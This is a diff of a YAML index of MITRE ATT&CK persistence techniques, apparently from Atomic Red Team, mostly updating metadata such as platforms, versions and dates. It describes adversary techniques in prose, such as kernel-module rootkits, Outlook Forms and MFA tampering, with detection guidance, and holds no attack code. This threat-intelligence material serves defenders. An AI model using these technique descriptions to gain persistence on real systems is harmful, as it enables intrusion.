-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -32836,9 +33265,6 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests:
     - name: AWS - Create a new IAM user
@@ -32878,7 +33304,7 @@ persistence:
         elevation_required: false
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -32914,16 +33340,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -32964,7 +33389,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: AWS - Create a group and add a user to that group
@@ -33002,138 +33426,137 @@ persistence:
         name: sh
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -33170,7 +33593,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -33196,12 +33619,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -33279,9 +33700,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1542.004:
@@ -33308,7 +33728,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -33330,41 +33750,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -33373,22 +33762,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -33454,7 +33870,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -33528,11 +33943,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33549,7 +33963,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -33559,7 +33972,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33568,19 +33981,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -33628,11 +34039,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33661,24 +34073,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -33713,9 +34127,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -33775,7 +34186,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33800,13 +34211,11 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -33859,8 +34268,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
